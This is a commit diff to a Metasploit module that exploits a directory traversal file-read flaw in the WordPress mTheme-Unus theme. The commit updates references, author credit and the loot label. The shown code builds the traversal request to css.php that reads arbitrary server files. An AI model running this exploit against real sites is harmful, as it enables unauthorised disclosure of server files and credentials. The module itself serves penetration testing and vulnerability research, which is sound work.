Add author, EDB, WPVDB and fix loot.

2015-04-15 20:03:36 -03:00 · 2015-04-15 20:03:36 -03:00 · 0031f09d60
parent 0f1cf1d1b1
commit 0031f09d60
1 changed files with 5 additions and 5 deletions
--- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
@ -21,11 +21,12 @@ class Metasploit3 < Msf::Auxiliary
      },
      'References'     =>
        [
-          ['EDB', '77777']
+          ['EDB', '36733'],
+          ['WPVDB', '7898']
        ],
      'Author'         =>
        [
-          'TO DO', # Vulnerability discovery
+          'Khwanchai Kaewyos', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
        ],
      'License'        => MSF_LICENSE
@ -47,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary

    res = send_request_cgi({
      'method' => 'GET',
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'wp-content', 'themes', 'mTheme-Unus',
-                                'css', 'css.php'),
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'wp-content', 'themes', 'mTheme-Unus', 'css', 'css.php'),
      'vars_get' =>
        {
          'files' => "#{traversal}#{filename}"
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
      fname = datastore['FILEPATH']

      path = store_loot(
-        'rips.traversal',
+        'mobileedition.traversal',
        'text/plain',
        ip,
        res.body,